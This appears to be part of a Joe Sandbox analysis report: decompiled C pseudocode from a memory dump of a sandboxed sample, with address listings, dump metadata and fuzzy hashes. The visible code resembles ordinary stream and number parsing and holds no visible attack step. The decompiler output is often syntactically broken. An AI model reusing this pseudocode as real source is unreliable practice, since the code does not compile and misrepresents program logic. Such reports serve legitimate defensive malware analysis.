													_v88 = 0;
													goto L62;
												}
												_t229 = _t666 + 0x4e; // 0x4e
												_v96 = 0;
												_v108 = _t229;
												_v92 = 0;
												while(1) {
													_t643 =  *(_t666 + 0x10) & 0x000000ff;
													__eflags = _t643;
													if(_t643 == 0) {
														goto L119;
													}
													__eflags =  *((intOrPtr*)(_t666 + 0x25)) - _t574;
													if( *((intOrPtr*)(_t666 + 0x25)) == _t574) {
														_t603 = _v52;
														__eflags = _v80;
														_t575 = _v48;
														_t449 = _t603;
														if(_v80 == 0) {
															_v101 = 0;
															_v88 = _t643;
															goto L62;
														}
														_t283 = _t575 + 1; // 0x1
														_v68 = _t283;
														__eflags = _t603 -  &_v44;
														if(_t603 ==  &_v44) {
															_t484 = 0xf;
														} else {
															_t484 = _v44;
														}
														__eflags = _t484 - _v68;
														if(_t484 < _v68) {
															_v136 = 1;
															_v140 = 0;
															_v144 = 0;
															 *_t679 = _t575;
															E01464F90( &_v52);
															_t603 = _v52;
															_t679 = _t679 - 0x10;
														}
														_v80 = 0;
														 *((char*)(_t603 + _t575)) = _v80 & 0x000000ff;
														_t605 = _v68;
														_v48 = _t605;
														 *((char*)(_v52 + _t605)) = 0;
														L123:
														_t472 =  *(_t675 + 8);
														_t645 =  *(_t675 + 0xc);
														__eflags = _t472 - _t645;
														if(_t472 >= _t645) {
															L132:
															 *((intOrPtr*)( *_t675 + 0x28))();
															_t473 =  *(_t675 + 8);
															_t645 =  *(_t675 + 0xc);
															L125:
															__eflags = _t473 - _t645;
															if(_t473 >= _t645) {
																_t475 =  *((intOrPtr*)( *_t675 + 0x24))();
																__eflags = _t475 - 0xffffffff;
																if(_t475 != 0xffffffff) {
																	goto L126;
																}
																_t675 = 0;
																_v68 = _v101 & 0x000000ff;
																L127:
																__eflags = _v76;
																_t579 = (_t577 & 0xffffff00 | _v76 != 0x00000000) & _v64;
																__eflags = _t579;
																if(_t579 != 0) {
																	_t476 = _v76;
																	__eflags =  *((intOrPtr*)(_t476 + 8)) -  *((intOrPtr*)(_t476 + 0xc));
																	if( *((intOrPtr*)(_t476 + 8)) >=  *((intOrPtr*)(_t476 + 0xc))) {
																		__eflags =  *((intOrPtr*)( *_t476 + 0x24))() - 0xffffffff;
																		_t580 =  !=  ? 0 : _t579;
																		_t481 =  !=  ? _v76 : 0;
																		_v76 =  !=  ? _v76 : 0;
																	} else {
																		_t580 = 0;
																	}
																} else {
																	_t580 = _v64 & 0x000000ff;
																}
																__eflags = _t580 - _v68;
																if(_t580 != _v68) {
																	__eflags = _t675;
																	if(_t675 == 0) {
																		L153:
																		_t574 = 0xffffffff;
																		_t675 = 0;
																		__eflags = 0;
																		L154:
																		_v68 = 0xffffffff;
																		continue;
																	}
																	_t490 =  *(_t675 + 8);
																	__eflags = _t490 -  *(_t675 + 0xc);
																	if(_t490 >=  *(_t675 + 0xc)) {
																		_t492 =  *((intOrPtr*)( *_t675 + 0x24))();
																		_t574 = _t492;
																		__eflags = _t492 - 0xffffffff;
																		if(_t492 != 0xffffffff) {
																			goto L154;
																		}
																		goto L153;
																	}
																	_t574 =  *_t490 & 0x000000ff;
																	goto L154;
																} else {
																	_t575 = _v48;
																	_t449 = _v52;
																	_v68 = 0xffffffff;
																	goto L62;
																}
															}
															L126:
															_v68 = 0;
															goto L127;
														}
														L124:
														_t473 = _t472 + 1;
														__eflags = _t473;
														 *(_t675 + 8) = _t473;
														goto L125;
													}
													L119:
													__eflags =  *((intOrPtr*)(_t666 + 0x24)) - _t574;
													if( *((intOrPtr*)(_t666 + 0x24)) == _t574) {
														goto L89;
													}
													_v144 = _t574;
													_v140 = _v112;
													_t577 = _v108;
													 *_t679 = _t577;
													_t468 = memchr(??, ??, ??);
													__eflags = _t468;
													if(_t468 == 0) {
														goto L89;
													}
													_t469 = _t468 - _t577;
													_t598 = _v92;
													_t241 = _t469 - 6; // -6
													_t644 = _t241;
													__eflags = _t469 - 0xf;
													_t470 =  >  ? _t644 : _t469;
													__eflags = _v100 - _t598;
													if(__eflags < 0) {
														_t645 =  *(_t675 + 0xc);
														_v96 = _v101 & 0x000000ff;
														_t472 =  *(_t675 + 8);
														__eflags = _t472 - _t645;
														if(_t472 < _t645) {
															goto L124;
														}
														goto L132;
													}
													_t577 = _v84;
													_v80 = _v80 + 1;
													_t248 =  &_v96;
													 *_t248 = _v96 | _t644 & 0xffffff00 | __eflags > 0x00000000;
													__eflags =  *_t248;
													_v92 = _t470 + _t598 * _t577;
													goto L123;
												}
											} else {
												_v96 = 0;
												if(_v88 != 0) {
													_t575 = _v48;
													_v88 = 0;
													_v92 = 0;
													_v101 = _v88 & 0x000000ff;
													_t449 = _v52;
													L62:
													_t637 = _t449;
													if(_t575 != 0) {
														L90:
														_v76 = _v80 & 0x000000ff;
														_t184 = _t575 + 1; // 0x1
														_v64 = _t184;
														__eflags = _t637 -  &_v44;
														if(_t637 ==  &_v44) {
															_t453 = 0xf;
														} else {
															_t453 = _v44;
														}
														__eflags = _t453 - _v64;
														if(_t453 < _v64) {
															_v136 = 1;
															_v140 = 0;
															_v144 = 0;
															 *_t679 = _t575;
															E01464F90( &_v52);
															_t637 = _v52;
															_t679 = _t679 - 0x10;
														}
														 *((char*)(_t637 + _t575)) = _v76 & 0x000000ff;
														_v48 = _v64;
														 *((char*)(_v52 + _t575 + 1)) = 0;
														_v140 =  &_v52;
														_v144 =  *(_t666 + 0xc);
														 *_t679 =  *(_t666 + 8);
														_t461 = E01473040();
														__eflags = _t461;
														if(_t461 == 0) {
															 *_a24 = 4;
														}
														__eflags = _v72;
														if(_v72 != 0) {
															L96:
															_t449 = _v52;
															L97:
															__eflags = _v88;
															if(_v88 != 0) {
																goto L65;
															}
															__eflags = _v96;
															if(_v96 == 0) {
																_t671 = _v92;
																__eflags = _v102;
																_t641 =  ==  ? _t671 :  ~_t671;
																 *_a28 =  ==  ? _t671 :  ~_t671;
															} else {
																 *_a28 = 0xffffffff;
																 *_a24 = 4;
															}
															goto L66;
														} else {
															__eflags = _v80 | _v48;
															if((_v80 | _v48) == 0) {
																_t449 = _v52;
																L65:
																 *_a28 = 0;
																 *_a24 = 4;
																L66:
																if(_v101 != 0) {
																	 *_a24 =  *_a24 | 0x00000002;
																}
																if(_t449 !=  &_v44) {
																	 *_t679 = _t449;
																	L01477910();
																}
																return _t675;
															}
															goto L96;
														}
													}
													L63:
													if(_v72 == 1 || _v80 != 0) {
														goto L97;
													} else {
														goto L65;
													}
												}
												_v92 = 0;
												_v101 = (_v108 & 0x000000ff) + 0x30;
												while(1) {
													_t648 = _t574;
													if(_v108 > 0xa) {
														goto L86;
													}
													if(_t574 <= 0x2f || _t574 >= _v101) {
														L89:
														_t449 = _v52;
														_t575 = _v48;
														_v101 = 0;
														_t637 = _t449;
														__eflags = _t575;
														if(_t575 == 0) {
															goto L63;
														}
														goto L90;
													} else {
														L52:
														_t117 = _t648 - 0x30; // -48
														_t499 = _t117;
														L53:
														_t609 = _v92;
														_t731 = _v100 - _t609;
														if(_t731 < 0) {
															_t500 =  *(_t675 + 8);
															_t649 =  *(_t675 + 0xc);
															_v96 = 1;
															__eflags = _t500 - _t649;
															if(_t500 < _t649) {
																L55:
																_t501 = _t500 + 1;
																 *(_t675 + 8) = _t501;
																L56:
																if(_t501 >= _t649) {
																	_t503 =  *((intOrPtr*)( *_t675 + 0x24))();
																	__eflags = _t503 - 0xffffffff;
																	if(_t503 != 0xffffffff) {
																		goto L57;
																	}
																	_v68 = 1;
																	_t675 = 0;
																	L58:
																	_t582 = (_t574 & 0xffffff00 | _v76 != 0x00000000) & _v64;
																	if(_t582 != 0) {
																		_t505 = _v76;
																		__eflags =  *((intOrPtr*)(_t505 + 8)) -  *((intOrPtr*)(_t505 + 0xc));
																		if( *((intOrPtr*)(_t505 + 8)) >=  *((intOrPtr*)(_t505 + 0xc))) {
																			__eflags =  *((intOrPtr*)( *_t505 + 0x24))() - 0xffffffff;
																			_t583 =  !=  ? 0 : _t582;
																			_t510 =  !=  ? _v76 : 0;
																			_v76 =  !=  ? _v76 : 0;
																		} else {
																			_t583 = 0;
																		}
																	} else {
																		_t583 = _v64 & 0x000000ff;
																	}
																	if(_t583 != _v68) {
																		__eflags = _t675;
																		if(_t675 == 0) {
																			L145:
																			_t574 = 0xffffffff;
																			_t675 = 0;
																			__eflags = 0;
																			L146:
																			_v68 = 0xffffffff;
																			continue;
																		}
																		_t511 =  *(_t675 + 8);
																		__eflags = _t511 -  *(_t675 + 0xc);
																		if(_t511 >=  *(_t675 + 0xc)) {
																			_t513 =  *((intOrPtr*)( *_t675 + 0x24))();
																			_t574 = _t513;
																			__eflags = _t513 - 0xffffffff;
																			if(_t513 != 0xffffffff) {
																				goto L146;
																			}
																			goto L145;
																		}
																		_t574 =  *_t511 & 0x000000ff;
																		goto L146;
																	}
																	_t575 = _v48;
																	_t449 = _v52;
																	_v68 = 0xffffffff;
																	_v101 = 1;
																	goto L62;
																}
																L57:
																_v68 = 0;
																goto L58;
															}
															L101:
															 *((intOrPtr*)( *_t675 + 0x28))();
															_t501 =  *(_t675 + 8);
															_t649 =  *(_t675 + 0xc);
															goto L56;
														}
														_t574 = _v84;
														_v92 = _t499 + _t609 * _t574;
														_t500 =  *(_t675 + 8);
														_v96 = _v96 | _t648 & 0xffffff00 | _t731 > 0x00000000;
														_t649 =  *(_t675 + 0xc);
														_v80 = _v80 + 1;
														if(_t500 >= _t649) {
															goto L101;
														}
														goto L55;
													}
													L86:
													_t176 = _t574 - 0x30; // 0xcf
													__eflags = _t176 - 9;
													if(_t176 <= 9) {
														goto L52;
													}
													_t177 = _t574 - 0x61; // 0x9e
													__eflags = _t177 - 5;
													if(_t177 > 5) {
														_t574 = _t574 - 0x41;
														__eflags = _t574 - 5;
														if(_t574 > 5) {
															goto L89;
														}
														_t227 = _t648 - 0x37; // -55
														_t499 = _t227;
														goto L53;
													}
													_t178 = _t648 - 0x57; // -87
													_t499 = _t178;
													__eflags = _t648 - 0x56;
													if(_t648 != 0x56) {
														goto L53;
													}
													goto L89;
												}
											}
										}
										L44:
										_t518 = _v84;
										_v112 = _t518;
										_v108 = _t518;
										goto L45;
									}
								}
								_t545 = _v88;
								_t545 = _v68 - 8;
								_t623 = _t616 & 0xffffff00 | _t545 == 0x00000000 | _t545 & 0xffffff00 | _v68 == 0x00000008;
								__eflags = _t623;
								_v72 = _t623;
								if(_t623 == 0) {
									_v80 = _v80 + 1;
									_v72 = _t634;
									goto L36;
								}
								_t526 =  *(_t675 + 8);
								_t653 =  *(_t675 + 0xc);
								_v80 = 0;
								_v68 = 8;
								__eflags = _t526 - _t653;
								if(_t526 < _t653) {
									goto L37;
								}
								goto L77;
							}
							if(_v72 == 0) {
								break;
							}
							goto L32;
						}
						_v88 = 0;
						_v68 = _t616;
						_v84 = _v68;
						__eflags = _v84 - 0x10;
						if(_v84 != 0x10) {
							goto L44;
						}
						goto L137;
					}
				}
			}

0x01407b86
0x01407b89
0x01407b8c
0x01407b92
0x01407b95
0x01407b98
0x01407b9b
0x01407ba3
0x01407ba6
0x01407ba9
0x01407bac
0x01407baf
0x01407bb6
0x01407bbf
0x01407bc2
0x01407bc4
0x01407bc9
0x014083e7
0x014083ec
0x014083f3
0x014083f5
0x014083fd
0x01408404
0x0140840b
0x0140840f
0x01408416
0x0140841d
0x01408424
0x01408432
0x01408436
0x0140843d
0x01408440
0x0140844e
0x01408451
0x01408455
0x0140845d
0x01408460
0x01408460
0x01407bd2
0x01407bd9
0x01407bdc
0x01407be2
0x01407bf2
0x01407bf5
0x01407bf5
0x01407bff
0x01407c0c
0x01407c0e
0x014084a0
0x014084a6
0x014084a9
0x014086ea
0x014086f2
0x014086f6
0x014084af
0x014084af
0x014084af
0x01407c14
0x01407c14
0x01407c14
0x01407c1f
0x01407c2c
0x01407c2e
0x014084c0
0x014084c6
0x014084c9
0x014086b9
0x014086c3
0x014086cb
0x014086cf
0x014086d7
0x014084cf
0x014084cf
0x014084cf
0x01407c34
0x01407c34
0x01407c34
0x01407c3a
0x01408330
0x01408334
0x01408336
0x0140833a
0x01408341
0x00000000
0x01407c40
0x01407c42
0x014083c9
0x014083cc
0x014083cf
0x0140872f
0x01408732
0x0140873c
0x01408744
0x014083d5
0x014083d5
0x014083d5
0x01407c4e
0x01407c4e
0x01407c4e
0x01407c55
0x01407c59
0x01407c59
0x01407c5d
0x01407c6a
0x01407ef0
0x01407ef3
0x00000000
0x00000000
0x00000000
0x01407ef9
0x01407c70
0x01407c73
0x00000000
0x00000000
0x01407c75
0x01407c78
0x01407c7d
0x01408643
0x01408646
0x01408649
0x01407c83
0x01407c83
0x01407c86
0x01407c86
0x01407c8b
0x014085d5
0x014085d8
0x014085db
0x00000000
0x00000000
0x014085e1
0x014085e5
0x00000000
0x01407c91
0x01407c91
0x01407c91
0x01407c95
0x01407c9d
0x01407ca0
0x01408629
0x0140862f
0x01408632
0x01408750
0x0140875a
0x01408762
0x01408766
0x0140876e
0x01408638
0x01408638
0x01408638
0x01407ca6
0x01407ca6
0x01407ca6
0x01407cad
0x014085f0
0x014085f7
0x014085fb
0x01408602
0x00000000
0x01407cb3
0x01407cb5
0x0140861d
0x0140861d
0x01408622
0x01407cca
0x01407cca
0x01407cd1
0x00000000
0x01407cd1
0x01407cbb
0x01407cc1
0x0140860f
0x01408612
0x01408614
0x01408617
0x00000000
0x00000000
0x00000000
0x01407cc7
0x01407cc7
0x00000000
0x01407cc7
0x01407cc1
0x01407cad
0x014083c0
0x014083c0
0x01407cd5
0x01407cd5
0x01407cd8
0x01407cdb
0x01407ce2
0x01407ce6
0x01407ce9
0x01407cf9
0x00000000
0x00000000
0x01407d02
0x01407f07
0x01407f0e
0x01407f0e
0x01407f10
0x01407d12
0x01407d15
0x01407d2f
0x01407d31
0x01408554
0x0140855a
0x0140855e
0x01408561
0x00000000
0x01408561
0x01407d37
0x01407d3e
0x01407d42
0x01407d49
0x01407d49
0x01407d4c
0x01407d51
0x01407f50
0x01407f54
0x01407f5d
0x01407f5f
0x01407d65
0x01407d65
0x01407d69
0x01407d71
0x01407d74
0x014080c0
0x014080c6
0x014080c9
0x01408474
0x0140847e
0x01408486
0x0140848a
0x01408492
0x014080cf
0x014080cf
0x014080cf
0x01407d7a
0x01407d7a
0x01407d7a
0x01407d81
0x01407f88
0x01407f8a
0x01408110
0x01408110
0x01408115
0x01407f9f
0x01407f9f
0x01407fa3
0x01408576
0x0140857a
0x01408581
0x00000000
0x01408581
0x01407fa9
0x01407fad
0x00000000
0x01407fad
0x01407f90
0x01407f93
0x01407f96
0x01408100
0x01408103
0x01408105
0x01408108
0x00000000
0x00000000
0x00000000
0x01408108
0x01407f9c
0x00000000
0x01407d87
0x01407d8a
0x01407d8e
0x01407d95
0x00000000
0x01407d95
0x01407d81
0x01407f68
0x01407f6c
0x01407f6f
0x01407f72
0x00000000
0x00000000
0x01407f78
0x01407f7c
0x00000000
0x01407f7c
0x01407d57
0x01407d57
0x01407d5a
0x01407d5f
0x00000000
0x00000000
0x00000000
0x01408510
0x01408513
0x01408517
0x0140851a
0x0140851d
0x01407d98
0x01407d9c
0x01408287
0x01408287
0x0140828e
0x01407dab
0x01407db2
0x01407db9
0x01407dbc
0x01407dc0
0x01408318
0x01408322
0x01408327
0x01408327
0x01407dd0
0x01407dd3
0x01407dd7
0x01407ddc
0x01408168
0x0140816c
0x01408702
0x01408705
0x0140870c
0x01408710
0x01408713
0x01408716
0x00000000
0x01408716
0x01408172
0x01408175
0x01408179
0x0140817c
0x01408183
0x01408183
0x01408187
0x01408189
0x00000000
0x00000000
0x0140818b
0x0140818e
0x014082a0
0x014082a3
0x014082a7
0x014082aa
0x014082ac
0x0140871f
0x01408723
0x00000000
0x01408723
0x014082b2
0x014082b5
0x014082bb
0x014082bd
0x01408569
0x014082c3
0x014082c3
0x014082c3
0x014082c9
0x014082cb
0x014084e0
0x014084eb
0x014084f3
0x014084fb
0x014084fe
0x01408503
0x01408506
0x01408506
0x014082d5
0x014082dc
0x014082df
0x014082e5
0x014082e8
0x014081e6
0x014081e6
0x014081e9
0x014081ec
0x014081ee
0x01408241
0x01408245
0x01408248
0x0140824b
0x014081f6
0x014081f6
0x014081f8
0x01408678
0x0140867b
0x0140867e
0x00000000
0x00000000
0x01408688
0x0140868a
0x01408202
0x01408205
0x0140820a
0x0140820a
0x0140820d
0x01408350
0x01408356
0x01408359
0x01408658
0x01408660
0x01408668
0x0140866c
0x0140835f
0x0140835f
0x0140835f
0x01408213
0x01408213
0x01408213
0x01408217
0x0140821a
0x01408250
0x01408252
0x01408378
0x01408378
0x0140837d
0x0140837d
0x0140837f
0x0140837f
0x00000000
0x0140837f
0x01408258
0x0140825b
0x0140825e
0x0140836a
0x0140836d
0x0140836f
0x01408372
0x00000000
0x00000000
0x00000000
0x01408372
0x01408264
0x00000000
0x0140821c
0x0140821c
0x0140821f
0x01408222
0x00000000
0x01408222
0x0140821a
0x014081fe
0x014081fe
0x00000000
0x014081fe
0x014081f0
0x014081f0
0x014081f0
0x014081f3
0x00000000
0x014081f3
0x01408194
0x01408194
0x01408197
0x00000000
0x00000000
0x014081a3
0x014081a7
0x014081ab
0x014081ae
0x014081b1
0x014081b6
0x014081b8
0x00000000
0x00000000
0x014081be
0x014081c0
0x014081c3
0x014081c3
0x014081c6
0x014081c9
0x014081cc
0x014081cf
0x01408234
0x01408237
0x0140823a
0x0140823d
0x0140823f
0x00000000
0x00000000
0x00000000
0x0140823f
0x014081d1
0x014081dc
0x014081e0
0x014081e0
0x014081e0
0x014081e3
0x00000000
0x014081e3
0x01407de2
0x01407de6
0x01407dea
0x0140869c
0x0140869f
0x014086a3
0x014086aa
0x014086ad
0x01407e93
0x01407e93
0x01407e97
0x01407ff6
0x01407ffa
0x01407ffd
0x01408000
0x01408006
0x01408008
0x01408589
0x0140800e
0x0140800e
0x0140800e
0x01408014
0x01408016
0x01408526
0x01408531
0x01408539
0x01408541
0x01408544
0x01408549
0x0140854c
0x0140854c
0x01408020
0x01408026
0x0140802c
0x01408034
0x0140803b
0x01408042
0x01408045
0x0140804a
0x0140804c
0x014083b3
0x014083b3
0x01408052
0x01408056
0x01408064
0x01408064
0x01408067
0x01408067
0x0140806b
0x00000000
0x00000000
0x01408071
0x01408075
0x01408390
0x01408397
0x0140839b
0x014083a1
0x0140807b
0x0140807e
0x01408087
0x01408087
0x00000000
0x01408058
0x0140805b
0x0140805e
0x01408776
0x01407eb2
0x01407eb8
0x01407ebe
0x01407ec4
0x01407ec8
0x01407ecd
0x01407ecd
0x01407ed5
0x01407ed7
0x01407eda
0x01407eda
0x01407eeb
0x01407eeb
0x00000000
0x0140805e
0x01408056
0x01407e9d
0x01407ea1
0x00000000
0x00000000
0x00000000
0x00000000
0x01407ea1
0x01407df4
0x01407dfe
0x01407e01
0x01407e05
0x01407e08
0x00000000
0x00000000
0x01407e11
0x01407fe2
0x01407fe2
0x01407fe5
0x01407fe8
0x01407fec
0x01407fee
0x01407ff0
0x00000000
0x00000000
0x00000000
0x01407e20
0x01407e20
0x01407e20
0x01407e20
0x01407e23
0x01407e23
0x01407e26
0x01407e29
0x01408098
0x0140809b
0x0140809e
0x014080a2
0x014080a4
0x01407e52
0x01407e52
0x01407e55
0x01407e58
0x01407e5a
0x014085ba
0x014085bd
0x014085c0
0x00000000
0x00000000
0x014085c6
0x014085ca
0x01407e64
0x01407e6c
0x01407e6f
0x01408130
0x01408136
0x01408139
0x0140859a
0x014085a2
0x014085aa
0x014085ae
0x0140813f
0x0140813f
0x0140813f
0x01407e75
0x01407e75
0x01407e75
0x01407e7c
0x014080e0
0x014080e2
0x01408300
0x01408300
0x01408305
0x01408305
0x01408307
0x01408307
0x00000000
0x01408307
0x014080e8
0x014080eb
0x014080ee
0x014082f5
0x014082f8
0x014082fa
0x014082fd
0x00000000
0x00000000
0x00000000
0x014082fd
0x014080f4
0x00000000
0x014080f4
0x01407e82
0x01407e85
0x01407e88
0x01407e8f
0x00000000
0x01407e8f
0x01407e60
0x01407e60
0x00000000
0x01407e60
0x014080aa
0x014080ae
0x014080b1
0x014080b4
0x00000000
0x014080b4
0x01407e2f
0x01407e3a
0x01407e3d
0x01407e40
0x01407e43
0x01407e46
0x01407e4c
0x00000000
0x00000000
0x00000000
0x01407e4c
0x01407fc0
0x01407fc0
0x01407fc3
0x01407fc5
0x00000000
0x00000000
0x01407fcb
0x01407fce
0x01407fd0
0x01408150
0x01408153
0x01408156
0x00000000
0x00000000
0x0140815c
0x0140815c
0x00000000
0x0140815c
0x01407fd6
0x01407fd6
0x01407fd9
0x01407fdc
0x00000000
0x00000000
0x00000000
0x01407fdc
0x01407e01
0x01407ddc
0x01407da2
0x01407da2
0x01407da5
0x01407da8
0x00000000
0x01407da8
0x01407d15
0x01407f16
0x01407f1e
0x01407f25
0x01407f25
0x01407f27
0x01407f2a
0x01408120
0x01408124
0x00000000
0x01408124
0x01407f30
0x01407f33
0x01407f36
0x01407f3d
0x01407f44
0x01407f46
0x00000000
0x00000000
0x00000000
0x01407f46
0x01407d0c
0x00000000
0x00000000
0x00000000
0x01407d0c
0x01408273
0x01408277
0x0140827a
0x0140827d
0x01408281
0x00000000
0x00000000
0x00000000
0x01408281
0x01407c5d

Memory Dump Source

Source File: 00000000.00000002.240345679.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000000.00000002.240342452.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240433831.0000000001481000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240438442.0000000001482000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240507021.00000000014A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240548728.00000000014F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240554058.00000000014F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240573033.000000000151A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13c0000_N2wufLmC74.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 343bdffb29e1cf4b6088fc87d539c7d6b861e250257c92f7f766a775a1f8e579
Instruction ID: d41d3408800e9a5f9efcd9df60c6b2af49b671b5e3696e1cc46e4f318818d1ef
Opcode Fuzzy Hash: 343bdffb29e1cf4b6088fc87d539c7d6b861e250257c92f7f766a775a1f8e579
Instruction Fuzzy Hash: 23727E70E042998FDB12CFA9C59479DBFF1BF45321F18866AD495AB3E2C334A846CB41

Uniqueness

Uniqueness Score: -1.00%

Function 013F6B10 Relevance: 2.0, APIs: 1, Instructions: 770
stringCOMMONCrypto

Download Yara Rule

C-Code - Quality: 16%

			E013F6B10(void* __eflags, signed int _a4, signed int _a8, intOrPtr* _a12, signed int _a16, intOrPtr* _a20, intOrPtr _a24, signed int _a28, intOrPtr _a32, signed int* _a36) {
				void* _v16;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int* _v44;
				signed int _v48;
				char _v49;
				char _v50;
				signed int _v51;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				intOrPtr* _v72;
				signed int _v76;
				unsigned int _v80;
				void* _v89;
				intOrPtr* _t386;
				void* _t395;
				signed int _t399;
				char _t403;
				void* _t410;
				void* _t412;
				int _t415;
				signed int _t417;
				signed int _t421;
				intOrPtr* _t422;
				void* _t424;
				char* _t433;
				char _t435;
				void* _t437;
				intOrPtr _t438;
				void* _t445;
				void* _t447;
				void* _t449;
				void* _t451;
				char* _t452;
				signed int _t454;
				void* _t456;
				signed int _t457;
				intOrPtr* _t458;
				signed int _t459;
				signed int _t460;
				intOrPtr _t461;
				intOrPtr* _t464;
				void* _t466;
				intOrPtr* _t468;
				char _t475;
				signed int _t479;
				void* _t482;
				void* _t484;
				signed char* _t491;
				signed int _t493;
				char _t495;
				char* _t496;
				char _t498;
				signed int _t499;
				void* _t501;
				intOrPtr* _t503;
				void* _t505;
				signed int _t509;
				signed int _t511;
				signed int _t513;
				intOrPtr* _t516;
				char _t518;
				char _t520;
				signed int _t522;
				signed int _t523;
				void* _t526;
				void* _t528;
				signed char* _t529;
				signed int _t531;
				char _t533;
				char* _t534;
				char _t536;
				signed char* _t540;
				void* _t542;
				signed int _t543;
				signed char _t545;
				signed int _t546;
				signed int _t547;
				intOrPtr* _t548;
				signed int _t550;
				signed int _t552;
				signed int _t553;
				void* _t555;
				signed int _t556;
				void* _t558;
				signed int _t561;
				signed int _t562;
				signed int _t564;
				signed int _t565;
				signed int _t566;
				signed int* _t568;
				signed int _t570;
				signed int _t572;
				signed int _t574;
				signed int _t575;
				signed int* _t576;
				signed int _t577;
				signed int _t578;
				signed int _t579;
				void* _t611;
				signed int _t612;
				signed int _t630;
				intOrPtr _t632;
				signed char _t645;
				signed int _t648;
				signed int _t651;
				signed int _t653;
				signed int _t657;
				signed int _t659;
				char _t660;
				signed int _t662;
				void* _t665;
				signed int _t666;
				char _t669;
				char* _t671;
				signed int _t672;
				signed int _t673;
				signed int _t675;
				signed int _t677;
				signed int _t679;
				void* _t680;
				char _t684;
				intOrPtr _t686;
				char* _t687;
				signed int _t690;
				intOrPtr* _t695;
				intOrPtr* _t696;
				signed int _t698;
				signed int _t699;
				signed int _t700;
				signed int _t702;
				intOrPtr _t703;
				unsigned int _t706;
				unsigned int _t707;
				signed int* _t708;
				signed int* _t710;
				signed int _t711;
				intOrPtr* _t712;
				signed int _t713;
				char _t714;
				intOrPtr _t715;
				void* _t718;
				intOrPtr* _t720;
				signed int _t721;
				signed int* _t722;
				void* _t724;
				intOrPtr* _t725;
				intOrPtr* _t726;
				intOrPtr* _t727;
				intOrPtr* _t728;
				intOrPtr* _t730;
				intOrPtr* _t732;
				intOrPtr* _t733;
				intOrPtr* _t734;
				intOrPtr* _t735;
				intOrPtr* _t736;

				_t725 = _t724 - 0x5c;
				_t713 = _a8;
				_t695 = _a12;
				_v64 = _a4;
				_t543 = _a16;
				_v36 = _t713;
				_v68 = _t695;
				 *_t725 = _a32 + 0x6c;
				_v72 = E01474F00(__eflags);
				_t726 = _t725 - E013D6170(0x1b + _a28 * 8 >> 4 << 4);
				_v32 = _t713 == 0xffffffff;
				_v44 =  &_v89 & 0xfffffff0;
				_t645 = (_v64 & 0xffffff00 | _v64 != 0x00000000) & _v32 & 0x000000ff;
				if(_t645 != 0) {
					_t386 = _v64;
					__eflags =  *((intOrPtr*)(_t386 + 8)) -  *((intOrPtr*)(_t386 + 0xc));
					if( *((intOrPtr*)(_t386 + 8)) >=  *((intOrPtr*)(_t386 + 0xc))) {
						_v40 = _t645;
						__eflags =  *((intOrPtr*)( *_t386 + 0x24))() - 0xffffffff;
						_t390 =  !=  ? _v64 : 0;
						_v64 =  !=  ? _v64 : 0;
						_t648 =  !=  ? 0 : _v40 & 0x000000ff;
					} else {
						_t648 = 0;
					}
				} else {
					_t648 = _v32 & 0x000000ff;
				}
				_v51 = _t543 == 0xffffffff;
				_t545 = (_t543 & 0xffffff00 | _t695 != 0x00000000) & _v51 & 0x000000ff;
				if(_t545 != 0) {
					__eflags =  *((intOrPtr*)(_t695 + 8)) -  *((intOrPtr*)(_t695 + 0xc));
					if( *((intOrPtr*)(_t695 + 8)) >=  *((intOrPtr*)(_t695 + 0xc))) {
						_v40 = _t648;
						_t395 =  *((intOrPtr*)( *_t695 + 0x24))();
						_t648 = _v40 & 0x000000ff;
						__eflags = _t395 - 0xffffffff;
						_t397 =  !=  ? _t695 : 0;
						_v68 =  !=  ? _t695 : 0;
						_t546 =  !=  ? 0 : _t545;
					} else {
						_t546 = 0;
					}
				} else {
					_t546 = _v51 & 0x000000ff;
				}
				if(_t648 != _t546) {
					__eflags = _v64;
					if(_v64 == 0) {
						L8:
						_t399 = _t713;
					} else {
						__eflags = _v32;
						if(_v32 != 0) {
							_t711 = _v64;
							_t540 =  *(_t711 + 8);
							__eflags = _t540 -  *((intOrPtr*)(_t711 + 0xc));
							if(_t540 >=  *((intOrPtr*)(_t711 + 0xc))) {
								_t712 = _v64;
								_t542 =  *((intOrPtr*)( *_t712 + 0x24))();
								__eflags = _t542 - 0xffffffff;
								_t399 =  ==  ? 0xffffffff : _t542;
								_t694 =  !=  ? _t712 : 0;
								_v64 =  !=  ? _t712 : 0;
							} else {
								_t399 =  *_t540 & 0x000000ff;
							}
						} else {
							goto L8;
						}
					}
					_t696 = _v72;
					_t547 = _t399;
					 *_t726 = _t547;
					_v48 =  *((intOrPtr*)( *_t696 + 0x10))();
					_t727 = _t726 - 4;
					 *_t727 = _t547;
					_t548 = _t696;
					_t403 =  *((intOrPtr*)( *_t696 + 8))();
					_t728 = _t727 - 4;
					_t714 = _t403;
					__eflags = _a28;
					if(_a28 == 0) {
						goto L5;
					} else {
						_t698 = 0;
						_v56 =  &(_v44[_a28]);
						_t715 = _a24;
						_v49 = _t714;
						_v32 = 0;
						while(1) {
							L13:
							 *_t728 =  *((char*)( *((intOrPtr*)(_t715 + _t698 * 4))));
							_t410 =  *((intOrPtr*)( *_t548 + 0x10))();
							_t730 = _t728 - 4;
							__eflags = _v48 - _t410;
							if(_v48 == _t410) {
								break;
							}
							 *_t730 =  *((char*)( *((intOrPtr*)(_t715 + _t698 * 4))));
							_t412 =  *((intOrPtr*)( *_t548 + 8))();
							_t728 = _t730 - 4;
							__eflags = _v49 - _t412;
							if(_v49 == _t412) {
								break;
							} else {
								_t698 = _t698 + 1;
								__eflags = _a28 - _t698;
								if(_a28 != _t698) {
									continue;
								}
							}
							L15:
							_v80 = _t698;
							_t699 = _v32;
							__eflags = _t699 - 1;
